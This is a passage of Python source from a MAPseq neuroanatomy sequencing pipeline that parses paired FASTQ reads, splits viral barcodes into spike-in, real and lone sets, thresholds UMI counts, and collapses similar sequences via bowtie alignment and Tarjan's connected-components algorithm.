If None, will use default threshold\n \n '''\n aligner = config.get('ssifasta','tool')\n \n filepath = os.path.abspath(infile) \n dirname = os.path.dirname(filepath)\n if outdir is not None:\n dirname = outdir\n \n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename) \n logging.debug(f'handling {filepath} base={base}')\n \n # make raw fasta TSV of barcode-splitter output for one barcode. \n # trim to 44 nt since we know last 8 are SSI \n logging.debug('calc counts...')\n seqdf = make_fasta_df(config, infile)\n of = os.path.join(dirname , f'{base}.44.seq.tsv')\n seqdf.to_csv(of, sep='\\t')\n \n # to calculate threshold we need counts calculated. \n cdf = make_counts_df(config, seqdf, label=base) \n logging.debug(f'initial counts df {len(cdf)} all reads.')\n # these are ***READ*** counts\n of = os.path.join(dirname , f'{base}.44.counts.tsv')\n cdf.to_csv(of, sep='\\t') \n \n threshold = get_threshold(config, cdf, site)\n logging.debug(f'got threshold={threshold} for site {site}')\n tdf = threshold_counts(config, cdf, threshold=threshold)\n logging.info(f'at threshold={threshold} {len(tdf)} unique molecules.')\n \n # thresholded raw counts. duplicates are all one UMI, so set counts to 1. \n # each row (should be) a distinct UMI, so trim to 32. \n tdf['counts'] = 1 \n tdf['sequence'] = tdf['sequence'].str[:32]\n \n # this contains duplicate VBCs with *different* UMIs\n of = os.path.join(dirname , f'{base}.32.seq.tsv')\n tdf.to_csv(of, sep='\\t') \n \n # now have actual viral barcode df with *unique molecule counts.*\n vbcdf = make_counts_df(config, tdf)\n of = os.path.join(dirname , f'{base}.32.counts.tsv')\n vbcdf.to_csv(of, sep='\\t') \n \n # split out spike, real, lone, otherwise same as 32.counts.tsv \n #spikedf, realdf, lonedf = split_spike_real_lone_barcodes(config, vbcdf)\n spikedf, realdf, lonedf = split_spike_real_lone_barcodes(config, vbcdf)\n \n # write out this step...\n realdf.to_csv(os.path.join(dirname , f'{base}.real.counts.tsv'), sep='\\t')\n lonedf.to_csv(os.path.join(dirname , f'{base}.lone.counts.tsv'), sep='\\t')\n spikedf.to_csv(os.path.join(dirname , f'{base}.spike.counts.tsv'), sep='\\t')\n\n # remove homopolymers in real sequences.\n max_homopolymer_run=int(config.get('ssifasta', 'max_homopolymer_run')) \n realdf = remove_base_repeats(realdf, col='sequence', n=max_homopolymer_run)\n \n # align and collapse all. \n acrealdf = align_and_collapse(config, realdf, dirname, base, 'real')\n acspikedf = align_and_collapse(config, spikedf, dirname, base, 'spike')\n aclonedf = align_and_collapse(config, lonedf, dirname, base, 'lone')\n \n acrealdf.to_csv(os.path.join(dirname , f'{base}.real.tsv'), sep='\\t')\n acspikedf.to_csv(os.path.join(dirname , f'{base}.spike.tsv'), sep='\\t')\n aclonedf.to_csv(os.path.join(dirname , f'{base}.lone.tsv'), sep='\\t')\n\n # add labels for merging...\n acrealdf['type'] = 'real'\n acspikedf['type'] = 'spike'\n aclonedf['type'] = 'lone'\n\n outdf = merge_dfs([ acrealdf, acspikedf, aclonedf ])\n outdf['label'] = base\n outdf.sort_values(by = ['type', 'counts'], ascending = [True, False], inplace=True)\n outdf.reset_index(drop=True, inplace=True)\n return outdf\n\n\ndef align_and_collapse(config, countsdf, outdir, base, label):\n '''\n countsdf 'sequence' and 'counts' columns\n outdir working dir or temp dir. \n base leading file name, e.g. barcode label, e.g. 'SSI4'\n label type of sequence, e.g. 
real, spike, L1 (lone)\n \n '''\n newdf = None\n logging.debug(f'handling {base} {label}s...')\n aligner = config.get('ssifasta','tool')\n logging.info(f'{label} {len(countsdf)} sequences, representing {countsdf.counts.sum()} reads.') \n of = os.path.join( outdir , f'{base}.{label}.seq.fasta')\n logging.debug(f'make fasta for {aligner} = {of}') \n seqfasta = write_fasta_from_df(config, countsdf, outfile=of)\n of = os.path.join(outdir , f'{base}.{label}.{aligner}')\n logging.debug(f'running {aligner}...')\n try:\n afile = run_bowtie(config, seqfasta, of, tool=aligner ) \n logging.debug(f'handle {aligner} align file: {afile}')\n btdf = make_bowtie_df(afile)\n of = os.path.join(outdir , f'{base}.{label}.btdf.tsv')\n btdf.to_csv(of, sep='\\t') \n edgelist = edges_from_btdf(btdf)\n components = get_components(edgelist)\n logging.debug(f'countdf columns are {countsdf.columns}')\n newdf = collapse_counts_df(countsdf, components)\n logging.debug(f'orig len={len(countsdf)}, {len(components)} components, collapsed len={len(newdf)}')\n\n except NonZeroReturnException:\n logging.warning(f'NonZeroReturn Exception. Probably no {label}s found. ')\n newdf = pd.DataFrame(columns = ['sequence','counts'])\n return newdf\n\n\ndef max_hamming(sequence, sequencelist):\n '''\n calculates maximum mismatch between sequence and all sequences in sequencelist. \n assumes all sequences are same length\n no indels, just substitutions. \n '''\n #logging.debug(f'seq={sequence}')\n #logging.debug(f'sequencelist={sequencelist}')\n max_dist = 0\n for s in sequencelist:\n dist = 0\n for i in range(0,len(s)):\n if sequence[i] != s[i]:\n dist += 1\n if dist > max_dist:\n max_dist = dist\n return max_dist\n\n\ndef unique_df(seqdf):\n '''\n filters for only unique sequences, sets counts to 1\n '''\n pass\n\n\n\ndef collapse_counts_df(countsdf, components):\n '''\n takes components consisting of indices\n determines sequence with largest count columns: 'sequence', 'counts'\n collapses all other member components to the sequence of the largest.\n adds their counts to that of that sequence.\n retain columns and values for highest counts row. \n \n '''\n # list of lists to collect values..\n logging.debug(f'collapsing countsdf len={len(countsdf)} w/ {len(components)} components.')\n lol = []\n colnames = list(countsdf.columns)\n for component in components:\n logging.debug(f'component={component}')\n # make new df of only component sequence rows\n cdf = countsdf.iloc[component].reset_index(drop=True)\n logging.debug(f'cdf=\\n{cdf}')\n # which sequence has highest count?\n maxid = cdf.counts.idxmax()\n # extract sequence and count as python list\n row = list(cdf.iloc[maxid])\n # set counts as sum of all collapse sequences. 
\n row[1] = cdf.counts.sum()\n lol.append(row)\n \n if logging.getLogger().level <= logging.DEBUG:\n slist = list(cdf['sequence'])\n logging.debug(f'slist={slist}')\n if len(slist) > 1:\n s = row[0]\n maxdiff = max_hamming(s, slist)\n logging.debug(f'max_hamming = {maxdiff} n_seqs={len(slist)}')\n else:\n logging.debug(f'skip distance calc, one sequence in component.')\n \n newdf = pd.DataFrame(data=lol, columns=colnames)\n logging.debug(f'original len={len(countsdf)} collapsed len={len(newdf)}')\n newdf.sort_values('counts',ascending=False, inplace=True)\n newdf.reset_index(drop=True, inplace=True)\n return newdf\n\n\ndef edges_from_btdf(btdf):\n readlist = btdf.name_read.values.tolist()\n alignlist = btdf.name_align.values.tolist() \n edgelist = [ list(t) for t in zip(readlist, alignlist)]\n return edgelist\n\ndef get_components(edgelist):\n complist = []\n logging.debug(f'getting connected components from edgelist len={len(edgelist)}')\n if len(edgelist) < 100:\n logging.debug(f'{edgelist}')\n for g in tarjan(from_edges(edgelist)):\n complist.append(g)\n logging.debug(f'{len(complist)} components.')\n if len(edgelist) < 100:\n logging.debug(f'{complist}')\n return complist\n\n#\n# Tarjan's algorithm, same as Matlab graphconncomp() \n# https://rosettacode.org/wiki/Tarjan#Python:_As_function\n#\ndef from_edges(edges): \n class Node:\n def __init__(self):\n # root is one of:\n # None: not yet visited\n # -1: already processed\n # non-negative integer: what Wikipedia pseudo code calls 'lowlink'\n self.root = None\n self.succ = []\n\n nodes = defaultdict(Node)\n for v,w in edges:\n nodes[v].succ.append(nodes[w])\n\n for i,v in nodes.items(): # name the nodes for final output\n v.id = i\n\n return nodes.values()\n \n \ndef tarjan(V):\n '''\n May get recursion limit errors if input is large. \n https://stackoverflow.com/questions/5061582/setting-stacksize-in-a-python-script/16248113#16248113\n \n import resource, sys\n resource.setrlimit(resource.RLIMIT_STACK, (2**29,-1))\n sys.setrecursionlimit(10**6)\n '''\n def strongconnect(v, S):\n v.root = pos = len(S)\n S.append(v)\n\n for w in v.succ:\n if w.root is None: # not yet visited\n yield from strongconnect(w, S)\n\n if w.root >= 0: # still on stack\n v.root = min(v.root, w.root)\n\n if v.root == pos: # v is the root, return everything above\n res, S[pos:] = S[pos:], []\n for w in res:\n w.root = -1\n yield [r.id for r in res]\n\n for v in V:\n if v.root is None:\n yield from strongconnect(v, [])\n\ndef make_counts_df(config, seqdf, label=None):\n '''\n input dataframe with 'sequence' column\n make counts column for identical sequences. 
\n optionally assign a label to set in new column\n \n '''\n logging.debug(f'seqdf=\\n{seqdf}')\n ser = seqdf['sequence'].value_counts()\n df = pd.DataFrame(columns=['sequence','counts'])\n df['sequence'] = ser.index\n df['counts'] = ser.values\n logging.debug(f'counts df = \\n{df}')\n if label is not None:\n df['label'] = label\n return df\n\n\ndef make_fasta_df(config, infile, ignore_n=True):\n '''\n input fasta \n ignore 'N' sequences.\n ''' \n slist = []\n rcs = SeqIO.parse(infile, \"fasta\")\n handled = 0\n for sr in rcs:\n s = sr.seq\n if ('N' in sr) and ignore_n :\n pass\n else:\n slist.append(str(s))\n handled += 1 \n logging.debug(f\"kept {len(slist)} sequences out of {handled}\") \n df = pd.DataFrame(slist, columns=['sequence'] )\n return df\n\n\ndef trim_fasta(config, infile, outdir=None, length=44):\n filepath = os.path.abspath(infile) \n dirname = os.path.dirname(filepath)\n if outdir is not None:\n dirname = os.path.abspath(outdir)\n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename)\n head = filename.split('.')[0] \n logging.debug(f'handling {filepath}')\n \n ofpath = f'{dirname}/{head}.{length}.fasta'\n logging.debug(f'opening {ofpath}...')\n outfile = open(ofpath, 'w') \n trimmed = []\n sfa = SeqIO.parse(filepath, \"fasta\")\n for sr in sfa:\n tseq = sr.seq[:length]\n tsr = SeqRecord( tseq, id=sr.id, name=sr.name, description=sr.description)\n trimmed.append(tsr)\n SeqIO.write(trimmed, outfile, 'fasta')\n logging.debug(f'wrote {len(trimmed)} to {ofpath}')\n return ofpath\n\n\ndef cumulative_fract_idx_naive(ser, fract):\n '''\n value at index of row that marks cumulative fraction of total. \n assumes series sorted in descending order. \n starts with largest value. \n '''\n sum_total = ser.sum()\n fraction_int = int(fract * sum_total)\n cum_total = 0\n val = 0\n idx = 0\n for idx in range(0, len(ser)):\n val = ser[idx]\n cum_total = cum_total + val\n fraction = cum_total / sum_total\n if cum_total > fraction_int:\n break\n else:\n logging.debug(f'at idx={idx} fraction is {fraction}')\n logging.debug(f'val={val} idx={idx} cum_total={cum_total} ')\n return val \n \n\ndef cumulative_fract_idx(ser, fract):\n '''\n value at index of row that marks cumulative fraction of total. \n assumes series sorted in descending order. \n starts with largest value. 
\n '''\n sum_total = ser.sum()\n fraction_int = int(fract * sum_total)\n cumsum = ser.cumsum()\n ltser = cumsum[cumsum < fraction_int]\n if len(ltser) < 1:\n idx = 0\n val = ser.iloc[idx]\n else:\n idx = ltser.index[-1]\n val = ser[idx]\n logging.debug(f'val={val} idx={idx} ')\n return val \n\ndef calc_kneed_idx(x, y , inflect, poly=2, sense=4):\n '''\n assumes convex, then concave, decreasing curve.\n inflect = 'knee'|'elbow'\n \n '''\n if inflect == 'knee':\n kl = KneeLocator(x=x, y=y, S=sense, curve='convex',direction='decreasing',interp_method='polynomial',polynomial_degree=poly)\n val = kl.knee\n logging.debug(f'got value {val} for knee from kneed...')\n elif inflect == 'elbow':\n # not validated!\n kl = KneeLocator(x=x, y=y, S=sense, curve='convex',direction='decreasing',interp_method='polynomial',polynomial_degree=poly) \n val = kl.elbow\n logging.debug(f'got value {val} for elbow from kneed...')\n else:\n raise ValueError(f\"inflect must be 'knee' or 'elbow', got {inflect}\")\n return val\n\n\n\ndef calc_final_thresholds(config, threshdf):\n '''\n take threshold df for all sites, and derive final thresholds df for target and injection.\n \n threshdf columns used: site count_threshold \n \n target_threshold = 100\n target-control_threshold = 1000\n target-negative_threshold = 100\n target-lone_threshold = 100\n injection_threshold = 2\n injection-control_threshold=2\n \n \n 'site' 'threshold'\n \n \n '''\n tdf = pd.concat( [threshdf[threshdf['site'] == 'target-negative'], \n threshdf[threshdf['site'] == 'target']] )\n idf = threshdf[threshdf['site'] == 'injection']\n \n target_thresh = int(tdf['count_threshold'].min())\n inj_thresh = int(idf['count_threshold'].min())\n\n finaldf = pd.DataFrame( data=[ ['target', target_thresh ],['injection', inj_thresh] ], \n columns= ['site','threshold'] )\n \n return finaldf\n \n\n\n\n\ndef calc_thresholds_all(config, sampdf, filelist, fraction=None ):\n '''\n reads in all counts.df (assumes counts column).\n \n calculates thresholds for 'target' and 'injection'\n \n returns 2 dfs: the final thresholds, then the general per-site info.\n '''\n if fraction is not None:\n config.set('ssifasta','count_threshold_fraction', fraction)\n \n outlist = []\n \n for filename in filelist:\n logging.debug(f'handling {filename}') \n (rtprimer, site, brain, region) = guess_site(filename, sampdf)\n cdf = pd.read_csv(filename ,sep='\\t', index_col=0)\n (count_threshold, label, clength, counts_max, counts_min) = calculate_threshold(config, cdf, site )\n outlist.append( [rtprimer, site, count_threshold, label, clength, counts_max, counts_min ])\n threshdf = pd.DataFrame(data=outlist, columns=['rtprimer', 'site', 'count_threshold', 'label', 'counts_length', 'counts_max', 'counts_min' ])\n finaldf = calc_final_thresholds(config, threshdf) \n \n return (finaldf, threshdf)\n \n \n\ndef calculate_threshold(config, cdf, site=None):\n '''\n takes counts dataframe (with 'counts' column) \n if 'label', use that. \n and calculates 'shoulder' threshold\n site = ['control','injection','target'] \n Will use relevant threshold. 
If None, will use default threshold\n \n target_threshold=100\n target_ctrl_threshold=1000\n inj_threshold=2\n inj_ctrl_threshold=2\n \n '''\n count_pct = float(config.get('ssifasta','count_threshold_fraction'))\n min_threshold = int(config.get('ssifasta','count_threshold_min'))\n label = 'BCXXX'\n \n try:\n label = cdf['label'].unique()[0]\n except KeyError:\n logging.warning(f'no SSI label in DF')\n \n # assess distribution.\n counts = cdf['counts']\n clength = len(counts)\n counts_max = counts.max()\n counts_min = counts.min()\n counts_mean = counts.mean()\n logging.info(f'handling {label} length={clength} max={counts_max} min={counts_min} ')\n \n val = cumulative_fract_idx(counts, count_pct)\n if val < min_threshold:\n logging.warning(f'calc threshold < min...')\n else:\n logging.debug(f'calculated count threshold={val} for SSI={label}')\n count_threshold=max(val, min_threshold)\n \n \n #if site is None:\n # count_threshold = int(config.get('ssifasta', 'default_threshold'))\n #else:\n # count_threshold = int(config.get('ssifasta', f'{site}_threshold'))\n #logging.debug(f'count threshold for {site} = {count_threshold}')\n return (count_threshold, label, clength, counts_max, counts_min)\n\n\n\ndef calculate_threshold_kneed(config, cdf, site=None, inflect=None ):\n '''\n takes counts dataframe (with 'counts' column) \n if 'label', use that. \n and calculates 'knee' or 'elbow' threshold\n site = ['control','injection','target'] \n Will use relevant threshold. If None, will use default threshold\n \n target_threshold=100\n target_ctrl_threshold=1000\n inj_threshold=2\n inj_ctrl_threshold=2\n \n '''\n if inflect is None:\n inflect = config.get('ssifasta','threshold_heuristic')\n min_threshold = int(config.get('ssifasta','count_threshold_min'))\n label = 'BCXXX'\n \n try:\n label = cdf['label'].unique()[0]\n except KeyError:\n logging.warning(f'no SSI label in DF')\n \n # assess distribution.\n counts = cdf['counts']\n clength = len(counts)\n counts_max = counts.max()\n counts_min = counts.min()\n counts_mean = counts.mean()\n logging.info(f'handling {label} length={clength} max={counts_max} min={counts_min} ')\n \n val = calc_kneed_idx(cdf.index, cdf.counts, inflect=inflect )\n if val < min_threshold:\n logging.warning(f'kneed calc threshold < min...')\n else:\n logging.debug(f'calculated count threshold={val} for SSI={label}')\n count_threshold=max(val, min_threshold)\n \n #if site is None:\n # count_threshold = int(config.get('ssifasta', 'default_threshold'))\n #else:\n # count_threshold = int(config.get('ssifasta', f'{site}_threshold'))\n #logging.debug(f'count threshold for {site} = {count_threshold}')\n return (count_threshold, label, clength, counts_max, counts_min)\n\n\ndef calc_min_target(config, braindf):\n '''\n how many molecules (unique UMIs) are in supposedly target-negative area?\n '''\n countslist = []\n min_target = 0\n braindf['counts'] = braindf['counts'].astype(int)\n tndf = braindf[ braindf['site'] == 'target-negative']\n tndf = tndf[ tndf['type'] == 'real']\n lablist = list(tndf['label'].dropna().unique())\n for label in lablist:\n ldf = tndf[tndf['label'] == label]\n if len(ldf) > 0:\n countslist.append( ldf['counts'].sum())\n if len(countslist) > 0:\n min_target = max(countslist)\n logging.debug(f'calculated min_target={min_target}')\n return min_target\n\n\ndef get_threshold(config, cdf, site=None):\n '''\n site = ['control','injection','target'] \n Will use relevant threshold. 
If None, will use default threshold\n \n target_threshold=100\n target_ctrl_threshold=1000\n inj_threshold=2\n inj_ctrl_threshold=2\n \n '''\n count_threshold=2\n if site is None:\n count_threshold = int(config.get('ssifasta', 'default_threshold'))\n else:\n count_threshold = int(config.get('ssifasta', f'{site}_threshold'))\n logging.debug(f'count threshold for {site} = {count_threshold}')\n return count_threshold\n\n\ndef calc_freq_threshold(df, fraction, column):\n '''\n sorts the given column in descending order, \n finds the index below which the given fraction of the data points lie, \n returns column value at that point. \n '''\n ser = df[column].copy()\n ser.sort_values(ascending = False, inplace=True)\n ser.reset_index(drop=True, inplace=True)\n # NOTE: body reconstructed from the docstring; previously returned a hard-coded placeholder (122).\n idx = min( int(fraction * len(ser)), len(ser) - 1 )\n val = ser.iloc[idx]\n logging.debug(f'fraction={fraction} idx={idx} val={val}')\n return val\n\n\ndef threshold_counts(config, df, threshold=None):\n '''\n return rows with counts >= threshold. \n '''\n logging.debug(f'threshold counts threshold={threshold}')\n threshold= int(threshold) \n df = df[df['counts'] >= threshold].copy()\n return df\n\n\ndef filter_low_complexity(config, seqdf):\n # placeholder: low-complexity filtering not yet implemented, pass through unchanged.\n return seqdf\n\n\ndef split_spike_real_lone_barcodes(config, df):\n '''\n df has sequence counts\n should be length 32 ( 30 + YY ) Y= C or T\n \n '''\n # df[df[\"col\"].str.contains(\"this string\")==False]\n sire = config.get('ssifasta', 'spikeinregex')\n realre = config.get('ssifasta','realregex')\n lonere = config.get('ssifasta', 'loneregex')\n \n logging.debug(f'before filtering: {len(df)}') \n logging.debug(f\"spike-in regex = '{sire}' \")\n simap = df['sequence'].str.contains(sire, regex=True) == True\n \n spikedf = df[simap]\n spikedf.reset_index(inplace=True, drop=True)\n \n remaindf = df[~simap]\n logging.debug(f'spikeins={len(spikedf)} remaindf={len(remaindf)}')\n \n # split real/L1\n logging.debug(f\"realre = '{realre}' lonere = '{lonere}' \")\n realmap = remaindf['sequence'].str.contains(realre, regex=True) == True\n realdf = remaindf[realmap]\n realdf.reset_index(inplace=True, drop=True)\n \n lonemap = remaindf['sequence'].str.contains(lonere, regex=True) == True \n lonedf = remaindf[lonemap]\n lonedf.reset_index(inplace=True, drop=True)\n logging.info(f'initial={len(df)} spikeins={len(spikedf)} real={len(realdf)} lone={len(lonedf)}') \n return (spikedf, realdf, lonedf)\n\n\ndef load_sample_info(config, file_name):\n #\n # Parses Excel spreadsheet to get orderly sample metadata, saves as sampleinfo.tsv. \n # OR Reads in sampleinfo.tsv\n # Assumes various properties of spreadsheet that need to stay static. \n #\n # ['Tube # by user', 'Our Tube #', 'Sample names provided by user',\n # 'Site information', 'RT primers for MAPseq', 'Brain ', 'Column#']\n #\n # If brain is not given, or is empty, all are set to 'brain1'. \n # If region is not given, or is empty, all are set to \n # \n \n # Mappings for excel columns. \n sheet_to_sample = {\n 'Tube # by user' : 'usertube', \n 'Our Tube #' : 'ourtube', \n 'Sample names provided by user' : 'samplename', \n 'Site information' : 'siteinfo',\n 'RT primers for MAPseq' : 'rtprimer',\n 'Brain' : 'brain',\n 'Region' : 'region',\n }\n \n sample_columns = ['usertube', 'ourtube', 'samplename', 'siteinfo', 'rtprimer', 'brain', 'region'] \n int_sample_col = ['usertube', 'ourtube', 'rtprimer'] # brain is often not a number. 
\n str_sample_col = ['usertube', 'ourtube', 'samplename', 'siteinfo', 'rtprimer', 'brain' ,'region']\n\n if file_name.endswith('.xlsx'):\n sheet_name = 'Sample information'\n edf = pd.read_excel(file_name, sheet_name=sheet_name, header=1) \n sdf = pd.DataFrame()\n \n for ecol in edf.columns:\n ecol_stp = ecol.strip() \n try:\n # map using stripped column name, retrieve using actual excel column name\n # which may have trailing spaces...\n scol = sheet_to_sample[ecol_stp]\n logging.debug(f'found mapping {ecol} -> {scol}')\n cser = edf[ecol]\n logging.debug(f'column for {scol}:\\n{cser}')\n sdf[scol] = cser\n \n except KeyError:\n logging.debug(f'no mapping for {ecol} continuing...')\n \n except Exception as ex:\n logging.error(f'error while handling {ecol} ')\n logging.warning(traceback.format_exc(None))\n\n #sdf[sample_columns[i]] = pd.Series(np.nan, np.arange(len(edf))) \n for scol in sample_columns:\n try:\n ser = sdf[scol]\n except KeyError as ke:\n logging.warning(f'no column {scol}, required. Creating...')\n if scol == 'samplename':\n sdf[scol] = sdf['ourtube']\n \n sdf.replace(r'^\\s*$', float('NaN'), regex = True, inplace=True)\n sdf.dropna(how='all', axis=0, inplace=True) \n sdf = fix_columns_int(sdf, columns=int_sample_col)\n sdf = fix_columns_str(sdf, columns=str_sample_col)\n\n elif file_name.endswith('.tsv'):\n sdf = pd.read_csv(file_name, sep='\\t', index_col=0, keep_default_na=False, dtype =str, comment=\"#\")\n #df.fillna(value='', inplace=True)\n sdf = sdf.astype('str', copy=False) \n sdf = fix_columns_int(sdf, columns=int_sample_col)\n else:\n logging.error(f'file {file_name} neither .xlsx or .tsv')\n sdf = None\n \n logging.debug(f'created reduced sample info df:\\n{sdf}')\n return sdf\n\n\ndef merge_fastq_pairs(config, readfilelist, outdir):\n logging.debug(f'processing {readfilelist}')\n if outdir is None:\n outdir = \".\"\n else:\n if not os.path.exists(outdir):\n os.makedirs(outdir, exist_ok=True)\n logging.debug(f'made outdir={outdir}')\n pairshandled = 0\n for (read1file, read2file) in readfilelist:\n logging.debug(f'read1file = {read1file}')\n logging.debug(f'read2file = {read2file}')\n pairshandled += 1 \n # NOTE: merging logic not yet implemented; this stub only walks and counts the pairs.\n\n\n \n\ndef process_fastq_pairs(config, sampdf, readfilelist, bclist, outdir, force=False, countsplots=True):\n\n # if all the output files for bclist exist, don't recalc unless force=True. 
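\n # read-handling sketch (numbers illustrative; real slice bounds come from the [fastq] config section):\n # each fullread is r1.seq[r1s:r1e] + r2.seq[r2s:r2e], e.g. a 32bp slice of read 1 joined to a\n # 20bp slice of read 2, and every SSI handler in bclist gets a chance to match it.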
\n if outdir is None:\n outdir = \".\"\n else:\n if not os.path.exists(outdir):\n os.makedirs(outdir, exist_ok=True)\n logging.debug(f'made outdir={outdir}')\n output_exists = check_output(bclist)\n logging.debug(f'output_exists={output_exists} force={force}')\n \n if ( not output_exists ) or force:\n outfile = os.path.abspath(f'{outdir}/unmatched.fasta')\n pairedfile = os.path.abspath(f'{outdir}/paired.txt')\n umf = open(outfile, 'w')\n pf = open(pairedfile, 'w')\n r1s = int(config.get('fastq','r1start'))\n r1e = int(config.get('fastq','r1end'))\n r2s = int(config.get('fastq','r2start'))\n r2e = int(config.get('fastq','r2end'))\n \n seqhandled_interval = int(config.get('fastq','seqhandled_interval')) \n matched_interval = int(config.get('fastq','matched_interval'))\n unmatched_interval = int(config.get('fastq','unmatched_interval'))\n\n seqshandled = 0\n pairshandled = 0\n unmatched = 0\n didmatch = 0\n \n #\n # handle pairs of readfiles from readfilelist\n #\n for (read1file, read2file) in readfilelist:\n pairshandled += 1\n logging.debug(f'handling file pair {pairshandled}')\n if read1file.endswith('.gz'):\n read1file = gzip.open(read1file, \"rt\")\n if read2file.endswith('.gz'):\n read2file = gzip.open(read2file, \"rt\") \n \n recs1 = SeqIO.parse(read1file, \"fastq\")\n recs2 = SeqIO.parse(read2file, \"fastq\")\n \n while True:\n try:\n r1 = next(recs1)\n r2 = next(recs2)\n sub1 = r1.seq[r1s:r1e]\n sub2 = r2.seq[r2s:r2e]\n fullread = sub1 + sub2\n pf.write(f'{fullread}\\n')\n \n matched = False\n for bch in bclist:\n r = bch.do_match(seqshandled, fullread)\n if r:\n didmatch += 1\n if didmatch % matched_interval == 0:\n logging.debug(f'match {didmatch}: found SSI {bch.label} in {fullread}!')\n matched = True\n break\n if not matched:\n unmatched += 1\n if unmatched % unmatched_interval == 0:\n logging.debug(f'{unmatched} unmatched so far.')\n id = str(seqshandled)\n sr = SeqRecord( fullread, id=id, name=id, description=id)\n SeqIO.write([sr], umf, 'fasta')\n \n seqshandled += 1\n if seqshandled % seqhandled_interval == 0: \n logging.info(f'handled {seqshandled} reads from pair {pairshandled}. matched={didmatch} unmatched={unmatched}')\n \n except StopIteration as e:\n logging.debug(f'iteration stopped')\n break\n \n \n umf.close()\n pf.close()\n for bch in bclist:\n bch.finalize() \n # close possible gzip filehandles??\n #max_mismatch = bclist[0].max_mismatch\n logging.info(f'handled {seqshandled} sequences. {pairshandled} pairs. {didmatch} matched. {unmatched} unmatched')\n else:\n logging.warning('all output exists and force=False. Not recalculating.')\n \n filelist = []\n for bch in bclist:\n filelist.append(bch.filename)\n logging.info(f'Making counts df for {filelist} in {outdir}')\n make_counts_dfs(config, filelist, outdir)\n\n # by default make countsplots \n if countsplots:\n logging.info('Making combined countsplots PDF...')\n countsfilelist = []\n for bch in bclist:\n dirname = os.path.dirname(bch.filename)\n filename = os.path.basename(bch.filename)\n (base, ext) = os.path.splitext(filename) \n of = os.path.join(dirname , f'{base}.44.counts.tsv')\n countsfilelist.append(of)\n make_countsplot_combined_sns(config, sampdf, countsfilelist, outdir=outdir, expid=None )\n\n\n\ndef calc_thread_count(nthreads):\n ncpus = os.cpu_count()\n threads = 1 # safe default\n if nthreads >= 1:\n # use nthreads CPUS up to ncpus.\n threads = min(nthreads, ncpus)\n logging.debug(f'nthreads positive. 
use {threads}') \n elif nthreads < 0:\n # use all but -N CPUs\n threads = ncpus - abs(nthreads)\n threads = max(threads, 1)\n logging.debug(f'nthreads negative. Use all but {abs(nthreads)}')\n else:\n # nthreads is 0\n logging.debug(f'nthreads = 0, use all CPUS: {ncpus}')\n threads = ncpus\n return (ncpus, threads)\n\n\ndef process_fastq_pairs_parallel(config, readfilelist, bclist, outdir, nthreads, force=False):\n '''\n \n nthreads: use this number of CPUs. 0 means all. -1 means all but 1. 3 means 3. \n \n '''\n ncpus, threads = calc_thread_count(nthreads) \n logging.info(f'using {threads} of {ncpus} CPUs in parallel...')\n\n prog = os.path.expanduser('~/git/mapseq-processing/scripts/process_fastq_thread.py')\n readfilestr = \"\"\n for (a,b) in readfilelist:\n readfilestr += f\" {a} {b} \"\n \n logging.debug(f'readfilestr = {readfilestr}')\n \n from cshlwork.utils import JobRunner, JobStack, JobSet\n \n jstack = JobStack()\n \n for bco in bclist:\n cmd = [ prog, \n '-d',\n '-B', bco.label , \n '-O' , outdir ,\n readfilestr \n ]\n jstack.addjob(cmd)\n jset = JobSet(max_processes = threads, jobstack = jstack)\n jset.runjobs()\n \n \n filelist = []\n for bco in bclist:\n filelist.append(bco.filename)\n logging.info(f'Making counts df for {filelist} in {outdir}')\n make_counts_dfs(config, filelist, outdir)\n\n\ndef process_fastq_pairs_single(config, readfilelist, bclist, outdir, force=False):\n\n # if all the output files for bclist exist, don't recalc unless force=True. \n if outdir is None:\n outdir = \".\"\n else:\n if not os.path.exists(outdir):\n os.makedirs(outdir, exist_ok=True)\n logging.debug(f'made outdir={outdir}')\n output_exists = check_output(bclist)\n logging.debug(f'output_exists={output_exists} force={force}')\n \n # list should have only one...\n bcho = bclist[0]\n \n if ( not output_exists ) or force:\n #outfile = os.path.abspath(f'{outdir}/unmatched.fasta')\n #pairedfile = os.path.abspath(f'{outdir}/paired.txt')\n #umf = open(outfile, 'w')\n #pf = open(pairedfile, 'w')\n r1s = int(config.get('fastq','r1start'))\n r1e = int(config.get('fastq','r1end'))\n r2s = int(config.get('fastq','r2start'))\n r2e = int(config.get('fastq','r2end'))\n \n seqhandled_interval = int(config.get('fastq','seqhandled_interval')) \n matched_interval = int(config.get('fastq','matched_interval'))\n unmatched_interval = int(config.get('fastq','unmatched_interval'))\n\n seqshandled = 0\n pairshandled = 0\n unmatched = 0\n didmatch = 0\n \n #\n # handle pairs of readfiles from readfilelist\n #\n for (read1file, read2file) in readfilelist:\n pairshandled += 1\n logging.debug(f'handling file pair {pairshandled}')\n if read1file.endswith('.gz'):\n read1file = gzip.open(read1file, \"rt\")\n if read2file.endswith('.gz'):\n read2file = gzip.open(read2file, \"rt\") \n \n recs1 = SeqIO.parse(read1file, \"fastq\")\n recs2 = SeqIO.parse(read2file, \"fastq\")\n \n while True:\n try:\n r1 = next(recs1)\n r2 = next(recs2)\n sub1 = r1.seq[r1s:r1e]\n sub2 = r2.seq[r2s:r2e]\n fullread = sub1 + sub2\n #pf.write(f'{fullread}\\n')\n \n matched = False\n r = bcho.do_match(seqshandled, fullread)\n if r:\n didmatch += 1\n if didmatch % matched_interval == 0:\n logging.debug(f'match {didmatch}: found SSI {bcho.label} in {fullread}!')\n matched = True\n else:\n unmatched += 1\n # when processing single, unmatched number not useful. 
\n #if unmatched % unmatched_interval == 0:\n # logging.debug(f'{unmatched} unmatched so far.')\n #id = str(seqshandled)\n #sr = SeqRecord( fullread, id=id, name=id, description=id)\n #SeqIO.write([sr], umf, 'fasta')\n \n seqshandled += 1\n if seqshandled % seqhandled_interval == 0: \n logging.debug(f'handled {seqshandled} reads from pair {pairshandled}. matched={didmatch} unmatched={unmatched}')\n \n except StopIteration as e:\n logging.debug(f'iteration stopped')\n break\n \n #umf.close()\n #pf.close()\n #for bch in bclist:\n bcho.finalize() \n # close possible gzip filehandles??\n #max_mismatch = bclist[0].max_mismatch\n logging.info(f'handled {seqshandled} sequences. {pairshandled} pairs. {didmatch} matched. {unmatched} unmatched')\n else:\n logging.warning('all output exists and force=False. Not recalculating.')\n \n\ndef make_counts_dfs(config, filelist, outdir):\n '''\n make per-SSI sequence and counts TSVs for each file in filelist. \n '''\n dflist = []\n for filepath in filelist:\n logging.debug(f'calculating counts for file {filepath} ...') \n dirname = 